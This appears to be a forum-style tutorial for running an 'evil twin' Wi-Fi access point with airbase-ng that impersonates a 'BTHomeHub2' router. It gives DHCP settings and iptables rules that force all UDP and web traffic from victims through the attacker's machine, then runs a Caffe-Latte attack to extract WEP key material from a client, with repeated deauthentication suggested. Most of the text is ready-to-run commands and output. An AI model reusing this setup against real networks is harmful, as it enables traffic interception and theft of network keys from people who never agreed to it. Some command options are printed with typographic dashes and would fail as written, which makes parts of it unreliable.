Code:
airbase-ng -e BTHomeHub2 -c 1 wlan0
-e Essid For AP
-c Channel Number
wlan0 Wireless Interface
This will then create a tap device like below
Code:
root@bt:~# airbase-ng -e BTHomeHub2 -c 1 wlan0 08:15:24 Created tap interface at0 08:15:24 Trying to set MTU on at0 to 1500 08:15:24 Trying to set MTU on wlan0 to 1800 08:15:24 Access Point with BSSID 00:C0:CA:47:32:24 started.
-e Essid
-c Channel Number
wlan0 wireless interface
Now that we have the ap running we need to make it so the clients can obtain a ip address so lets set up are ip tables
Code:
ifconfig at0 up ifconfig at0 192.168.1.254 netmask 255.255.255.0 route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254
here is my dhcp.conf
Code:
ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; authoritative; subnet 192.168.1.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 192.168.1.255; option routers 192.168.1.254; option domain-name-servers home; range 192.168.1.1 192.168.1.140; }
Once that has been entered & saved dhcp server can be started
Code:
/etc/init.d/dhcp3-server start
Code:
iptables –flush iptables –table nat –flush iptables –delete-chain iptables –table nat –delete-chain iptables –table nat –append POSTROUTING –out-interface wlan0 -j MASQUERADE iptables –append FORWARD –in-interface at0 -j ACCEPT iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.1.254 iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000 echo 1 > /proc/sys/net/ipv4/ip_forward
Code:
airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0
Code:
root@bt:~# airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0 08:33:13 Created tap interface at0 08:33:13 Trying to set MTU on at0 to 1500 08:33:13 Access Point with BSSID 00:C0:CA:47:32:24 started. 08:33:22 Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: “BTHomeHub2″ 08:33:32 Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: “BTHomeHub2″ 08:33:32 Starting Caffe-Latte attack against 00:1F:1F:14:4D:6B at 150 pps.
-L caffe-latte attack
-L WEP encrytion on
-x Number of packets to send
-e Essid
-c channel Number
wlan0 wireless interface
The only problem is that I haven’t managed to get the caffe-latte attack fully working due to the fact that the only time it captures Iv correctly is when the client reconnects to the ap so the only way ivs had caffe-latte working kind of well is to DE authenticate the client every 10 seconds.
Visit Root Developpers
And Facebook Page : https://www.facebook.com/root.develop